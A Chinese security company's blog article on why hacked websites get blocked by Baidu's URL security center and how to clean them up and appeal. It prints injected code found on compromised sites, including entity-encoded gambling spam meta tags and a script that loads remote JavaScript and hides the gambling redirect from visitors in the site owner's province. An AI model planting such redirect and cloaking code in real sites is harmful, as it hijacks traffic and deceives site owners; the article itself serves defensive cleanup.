Sine安全-网络安全背后的巨人,提供服务器安全_服务器维护_网站安全解决方案

百度网址安全中心怎么取消拦截?



         很多客户找到我们SINE网站安全公司,说自己的网站被百度网址安全中心拦截了,从百度

点击网站进去跳转到博彩网站上去,直接输入网址不会出现跳转。还有的客
户网站被百度拦截

的时候会有一些红色文字提醒:
 
百度网址安全中心提醒您:该页面可能已被非法篡改!等等的字样,如下图:



 
 
甚至有些客户网站被黑后直接打开跳转到彩票网站上去了,网站的百度快照与收录也被篡改成了

什么北京赛车,北京PK10,等等内容。大部分客户的网站被百度拦截
是因为网站存在漏洞被攻

击,攻击者篡改了网站首页文件,我们SINE安全在帮客户
解除百度拦截的时候,发现很多客户

网站安全没有设置到位,网站漏洞也没有修复
,包括网站后台账号密码都是弱密码,什么12345

6,111111,admin,还有的是ftp
账号密码弱口令,默认的网站后台地址等等。
 
 
(一)网站被百度网址安全中心拦截不要紧!遇事千万不要慌,静下来去分析问题
 
发生的根本,我们首先要检测网站是否被黑,看下我们网站的首页文件index.html或者index.php

文件里代码,一般会放在头部,你会发现有一些加密的字符,很长
一段,下面我贴出来。
 
<title>&#51;&#54;&#53;&#98;&#101;&#116;&#28216;&#25103;&#24179;&#21488;&
 
#95;&#51;&#54;&#53;&#98;&#101;&#116;&#23089;&#20048;&#24179;&#21488;&#95
 
;&#98;&#101;&#116;&#51;&#54;&#53;&#20307;&#32946;&#25237;&#27880;</title>
 
<meta name="keywords" 
 
content="&#51;&#54;&#53;&#98;&#101;&#116;&#24179;&#21488;&#27880;&#20876
 
;&#44;&#51;&#54;&#53;&#98;&#101;&#116;&#20307;&#32946;&#24179;&#21488;&#
 
44;&#51;&#54;&#53;&#98;&#101;&#116;&#23089;&#20048;&#24179;&#21488;&#44;
 
&#51;&#54;&#53;&#98;&#101;&#116;&#23448;&#26041;&#24179;&#21488;&#44;&#5
 
1;&#54;&#53;&#98;&#101;&#116;&#24320;&#25143;&#24179;&#21488;&#44;&#51;&
 
#54;&#53;&#98;&#101;&#116;&#24179;&#21488;&#36172;&#22330;&#44;&#51;&#54
 
;&#53;&#98;&#101;&#116;&#30343;&#20896;&#24179;&#21488;&#44;&#51;&#54;&#
 
53;&#98;&#101;&#116;&#24179;&#21488;&#32593;&#25237;&#44;&#51;&#54;&#53;
 
&#98;&#101;&#116;&#24179;&#21488;&#35268;&#21017;&#44;&#51;&#54;&#53;&#9
 
8;&#101;&#116;&#23089;&#20048;&#22330;&#24179;&#21488;&#44;&#51;&#54;&#5
 
3;&#98;&#101;&#116;&#32593;&#31449;&#24179;&#21488;&#44;&#51;&#54;&#53;&
 
#98;&#101;&#116;&#36275;&#29699;&#24179;&#21488;&#44;&#51;&#54;&#53;&#98
 
;&#101;&#116;&#24179;&#21488;&#36820;&#21033;&#44;&#51;&#54;&#53;&#98;&#
 
101;&#116;&#32593;&#19978;&#23089;&#20048;&#24179;&#21488;&#44;&#51;&#54
 
;&#53;&#98;&#101;&#116;&#32447;&#19978;&#24179;&#21488;"/>
 
 
<meta name="description" 
 
content="&#98;&#101;&#116;&#51;&#54;&#53;&#20307;&#32946;&#22269;&#38469
 
;&#23089;&#20048;&#12304;&#21807;&#19968;&#21338;&#24425;&#20449;&#35465
 
;&#25285;&#20445;&#31532;&#19977;&#26041;&#24179;&#21488;&#58;&#40;&#48;
 
&#49;&#51;&#54;&#53;&#54;&#54;&#46;&#99;&#111;&#109;&#41;&#12305;&#98;&#
 
101;&#116;&#51;&#54;&#53;&#20307;&#32946;&#23089;&#20048;&#30495;&#20154
 
;&#23089;&#20048;&#65292;&#20122;&#27954;&#26368;&#26377;&#20844;&#20449
 
;&#21147;&#30340;&#32593;&#19978;&#23089;&#20048;&#24179;&#21488;&#23448
 
;&#32593;&#20445;&#35777;&#29609;&#23478;&#25343;&#21040;&#27599;&#19968
 
;&#20998;&#38065;&#12290;&#12304;&#26435;&#23041;&#35748;&#35777;&#12305
 
;"/>
 
标题,描述,都被修改成了加密的数字字符,我们对其解码来看下。
 
unicode的加密方式我们用站长工具解密看下:
 
 
网站的标题都改成了博彩的关键词.
 

 
我们最新发现网站被跳转到博彩网站上,有些是根据IP来判断跳转的,比如说这个网站的运营者

是广东省的,那么攻击者就会让广东省的IP都不会跳转到博彩网站上
,这个用意就是让网站的运

营者无法发现网站出现了问题,来达到长期控制网站的
目的。
 
代码我们SINE安全公布出来:
 
<script language="javascript" src="http://t.cn/RBAcEC8"></script> 
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("广东省")>=0)
 
{window.location.href="/indax.html";}</script>
<script language="javascript" src="http://t.cn/RBAaIdI"></script>
 
(二)再一个检查网站的收录情况:使用百度的site命令,site:www.客户网址.com来看下网站

是否收录了一些与网站内容不相关的百度快照,大部分是一些彩
票,博彩的百度快照。再看下

网站是否会有百度的网址安全中心拦截,目前被百度
安全中心拦截的提示会有如下几种显示:
 
1.百度网址安全中心提醒您:该页面可能已被非法篡改!
 
2.百度网址安全中心提醒您:该页面可能存在钓鱼欺诈信息!
 
3.百度网址安全中心提醒您:该页面可能存在违法信息!
 
4.该页面可能存在违法信息!
 
5.该页面可能已被非法篡改!
 
6.该页面可能存在钓鱼欺诈信息!
 
(三) 如果对网站代码不是太懂的话建议找专业网站安全公司来帮忙检查,有些可能会找建站

公司帮忙检查,大多数的建站公司不懂安全,只会简单的清理代码,
清除跳转,但是过不了几

天网站又就被跳转了,被百度拦截了,亡羊补牢而已,根
本问题是网站存在漏洞,要对网站漏

洞进行修复。
 
既然发现了网站被百度拦截,那么该如何解除拦截呢?
 
检查网站代码是否存在木马后门,对网站里的每个文件,每行代码都进行人工安全检测,发现

是否含有eval等一句话后门,以及一些加密的字符,如果有请仔细查看
并对其清除,再一个对

网站漏洞进行修复,现在许多网站使用的都是开源的系统,
比如织梦dedecms系统,discuz

论坛系统,phpcms,MetInfo,wordpress,帝国cms
,苹果cms,微擎系统,ecshop,对这些

系统的漏洞补丁经常的进行升级修复。上
面大部分的系统都是开源的代码,既然开源就是免费

对外,那么就很容易被挖掘出
漏洞,所以要对网站代码及时的进行网站漏洞修复。
 
 
检查网站的后台是否被人恶意登录,检查登录的IP,以及通过网站日志进行分析查看,是否有

其他的IP登录了网站后台,修改网站后台默认地址,以及网站后台的账
号密码,对网站安全比

较了解的话,也可以对网站后台登录进行二次验证码验证防
护。
 
 
对网站的目录权限进行安全部署分配,比如图片目录,以及css,js,cache缓存目录都设置为无

脚本执行权限,只有可写权限即可。


 
修复好了网站漏洞,以及清除网站木马,删除掉首页的加密代码,去除跳转,直接
 
去百度网址安全中心提交申诉:
 
https://bsb.baidu.com/appeal 百度网址安全中心

 
提交后百度会在24小时内给予反馈。
 
解除百度安全拦截会有如下邮件:
 
尊敬的用户:
 
您好!您于 2018年10月18日 09:17 对: http://www.客户网址.cn/ 进行了误报申诉。
 
百度网址安全技术人员答复如下:
 
您好,对于 http://www.客户网址.cn/ 的检测结果为:通过审核
 
感谢您的反馈,该网站已经解除拦截。百度搜索中展示的“风险”提示,需要“12小时”后生效

;百度杀毒中展示的“风险”提示,需要“重启电脑”后生效。我们
会严格保护您的隐私,不会

泄露您提交的任何隐私信息。如有问题可随时进行反馈
,感谢支持!
 
百度网址安全中心

分享:

相关推荐